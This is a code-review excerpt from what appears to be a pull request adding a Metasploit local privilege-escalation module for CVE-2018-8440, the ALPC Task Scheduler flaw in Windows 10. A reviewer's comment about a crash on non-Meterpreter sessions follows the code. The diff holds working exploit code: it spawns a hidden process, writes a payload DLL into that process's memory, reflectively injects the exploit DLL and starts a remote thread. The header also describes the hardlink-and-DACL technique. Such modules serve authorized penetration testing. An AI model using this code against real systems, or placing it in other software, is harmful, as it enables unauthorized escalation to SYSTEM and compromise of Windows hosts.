modules/exploits/windows/local/alpc_taskscheduler.rb

```diff
@@ -0,0 +1,136 @@
+        location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
+        created to a file the user has read access to. After creating a hardlink, the vulnerability
+        can be triggered to set the DACL on the linked file.
+
+        This module has been tested against Windows 10 Pro x64.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SandboxEscaper',       # Original discovery and PoC
+          'bwatters-r7',          # msf module
+          'asoto-r7',             # msf module
+          'Jacob Robles'          # msf module
+        ],
+      'Platform'       => 'win',
+      'SessionTypes'   => ['meterpreter','shell'],    #TODO: syntax for shell?
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => false
+        },
+      'Targets'        =>
+        [
+          ['Windows 10 x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-8440'],
+          ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
+        ],
+      'DisclosureDate' => 'Aug 27 2018',
+      'DefaultTarget'  => 0,
+    ))
+
+    register_options([OptString.new('PROCESS',
+        [false, 'Name of process to spawn and inject dll into.', nil])
+    ])
+  end
+
+  def setup_process(process_name)
+    begin
+      print_status("Launching #{process_name} to host the exploit...")
+      launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
+      process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Sandboxes could not allow to create a new process
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+    process
+  end
+
+  def inject_magic(process, payload_dll)
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
+    library_path = ::File.expand_path(library_path)
+    dll_data = ''
+    ::File.open(library_path, 'rb') { |f| dll_data = f.read }
+
+    print_status("Writing payload dll into process #{process.pid} memory")
+    payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
+    written = process.memory.write(payload_addr, payload_dll)
+
+    if written != payload_dll.length
+      fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
+    process.thread.create(exploit_mem + offset, payload_addr)
+  end
+
+  def validate_active_host
```

Comment:
This method will die horribly on shell sessions. `sysinfo` calls will raise ```undefined method `[]' for nil:NilClass``` on non-Meterpreter sessions. The two exceptions specifically being rescued won't rescue this error, resulting in a confusing and seemingly unrelated error message.